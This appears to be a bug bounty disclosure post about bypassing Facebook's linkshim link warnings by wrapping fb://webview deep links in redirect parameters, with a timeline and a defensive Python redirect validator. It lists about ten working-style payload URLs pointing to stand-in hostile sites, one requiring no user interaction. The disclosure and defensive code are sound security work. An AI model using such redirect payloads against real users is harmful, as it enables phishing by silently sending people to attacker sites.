Facebook: Linkshim protection bypass using fb://webview

Using the fb://webview deep link it is possible to bypass linkshim protection: the redirect parameter of several Facebook endpoints accepts the deep link, the app opens the wrapped URL in a WebView, and the user lands on the evilzone site without any warning.


Timeline:

  1. 12 September 2018: Reported
  2. 13 September 2018: Triaged
  3. 05 November 2020: Bounty Paid
  4. 14 November 2020: Fix released on the server side.

Vulnerable endpoints were:

Using the continue button:

  1. https://mbasic.facebook.com/a/feed_menu.php?story_fbid=xx&id=10000xx&menu_id=u_0_0&continue=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttps%3A%2F%2Fevilzone.org&action=us&gfid=xx

Using the cancel button:

  1. https://m.facebook.com/friends/selector/?return_uri=4&cancel_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&friends_key=ids&context&add_photos_uri&is_initial_render=0

Other redirect, return and cancel parameters:

  1. https://mbasic.facebook.com/stickers/229247431430xx/?redirect_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttps%3A%2F%2Fevilzone.org

  2. https://mbasic.facebook.com/messages/photo/?ids&tids%5B0%5D=cid.g.251480506187xxxx&message_text&cancel=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org

  3. https://mbasic.facebook.com/search/tabselector/?current_tab=keywords_top&cancel_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&query=ok&is_local_serp=0&is_trending=0&vertical=content&refid=46&ref=Footer

  4. https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevil.com

  5. https://mbasic.facebook.com/tokenizer/single/?mode=share_msg&sid=91916771814xxxx&returnURI=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&zero_e=2&zero_et=1536231748&_rdc=1&_rdr

  6. https://mbasic.facebook.com/photos/xtag_faces/?photo_id=1020467036791xxxx&owner_id=18157600xx&return_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&refid=13

  7. https://mbasic.facebook.com/privacyx/selector/?redirect_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&content_id=8787365733&content_type=1&selected_param=28695816140xxxx&autosave=1

Without user interaction:

  1. https://mbasic.facebook.com/friends/hovercard/mbasic/?uid=4&redirectURI=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org
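The root cause in every endpoint above is the same: a redirect parameter (`continue`, `cancel_uri`, `redirect_uri`, `return_uri`, `returnURI`, `redirectURI`, `groupuri`, `cancel`) is checked against the outer value only, so a `fb://webview/?url=...` wrapper hides the real destination from linkshim. The following added example (mine, not Facebook's code and not the actual server-side fix) shows the defensive check a web application should run on such parameters: unwrap any `fb://webview` layers first, then allow the redirect only if the final destination is a same-site path or an allow-listed host. The host allow-list and the parameter names are assumptions for illustration; the sample URL at the bottom is the hovercard endpoint from this post.

```python
from urllib.parse import urlparse, parse_qs

# Hypothetical allow-list of first-party hosts a post-action redirect may target.
ALLOWED_HOSTS = {"m.facebook.com", "mbasic.facebook.com", "www.facebook.com"}

# Query parameter names that carried the redirect target in the endpoints above.
REDIRECT_PARAMS = ("continue", "cancel_uri", "redirect_uri", "return_uri",
                   "returnURI", "redirectURI", "groupuri", "cancel")


def unwrap_deep_link(target: str, max_depth: int = 5) -> str:
    """Peel fb://webview/?url=<inner> wrappers (possibly nested) and return the
    innermost URL, which is what a redirect policy must actually evaluate."""
    for _ in range(max_depth):
        parsed = urlparse(target)
        if parsed.scheme != "fb" or parsed.netloc != "webview":
            break
        inner = parse_qs(parsed.query).get("url")  # parse_qs percent-decodes
        if not inner:
            break
        target = inner[0]
    return target


def is_safe_redirect(target: str) -> bool:
    """Return True only if the unwrapped destination stays on the site:
    a relative path (not protocol-relative) or an https URL to an allowed host."""
    final = unwrap_deep_link(target)
    parsed = urlparse(final)
    if parsed.netloc == "" and parsed.scheme == "":
        # Relative path such as /home.php; reject //evil.example (protocol-relative).
        return final.startswith("/") and not final.startswith("//")
    if parsed.scheme != "https":
        # Rejects http://, fb://, javascript:, data: and anything else.
        return False
    return parsed.hostname in ALLOWED_HOSTS


def audit_url(url: str) -> list:
    """Inspect one request URL and return (param, unwrapped_destination) for every
    redirect parameter that would leave the site. Usable both as a server-side
    gate and as a log-review helper over captured request URLs."""
    findings = []
    query = parse_qs(urlparse(url).query, keep_blank_values=True)
    for name in REDIRECT_PARAMS:
        for value in query.get(name, []):
            if not is_safe_redirect(value):
                findings.append((name, unwrap_deep_link(value)))
    return findings


if __name__ == "__main__":
    # Constructed sample: the "without user interaction" endpoint from the post.
    sample = ("https://mbasic.facebook.com/friends/hovercard/mbasic/?uid=4"
              "&redirectURI=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org")
    for param, dest in audit_url(sample):
        print(f"off-site redirect via {param!r} -> {dest}")
```

The important design choice is that `is_safe_redirect` evaluates the destination after unwrapping rather than the raw parameter value; a check that only looks at the outer string sees a scheme it trusts (`fb://`) and never reaches `evilzone.org`. Rejecting every non-https scheme also closes the same gap for any other app-internal scheme that can carry a URL.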

This post is licensed under CC BY 4.0 by the author.